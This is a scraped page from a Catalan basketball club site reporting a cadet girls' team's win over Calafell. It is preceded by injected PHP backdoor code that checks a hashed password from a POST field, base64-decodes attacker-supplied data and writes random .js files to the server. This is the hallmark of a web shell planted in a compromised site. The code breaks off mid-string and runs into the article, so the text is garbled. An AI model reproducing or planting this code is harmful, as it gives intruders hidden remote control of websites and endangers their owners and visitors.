function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet femení B treu l'orgull per vèncer el Calafell - Tgn Bàsquet Club -

El cadet femení B treu l’orgull per vèncer el Calafell

Updated: octubre 7, 2013

El TGN Bàsquet va aconseguir una victòria molt treballada contra el Calafell. Les noies que entrena Albert Gómez van començar amb molts dubtes i no va ser fins el segon període que van poder agafar les regnes tot i que amb un avantatge mínim (23-21 al descans).  El tercer període va ser nefast pel TGN Bàsquet doncs els visitants van marcar un parcial de sortida de 0-10 aprofitant la manca d’intensitat defensiva local. Tot i els esforços de les liles, es va entrar a l’últim quart amb una diferència de deu punts favorable al Calafell que feia presagiar una derrota, però les locals van ajustar la seva defensa i van recuperar la confiança en atac. El Calafell va notar negativament l’acumulació de faltes personals i un triple de Pastó culminava la remuntada lila que noquejava les aspiracions de les visitants.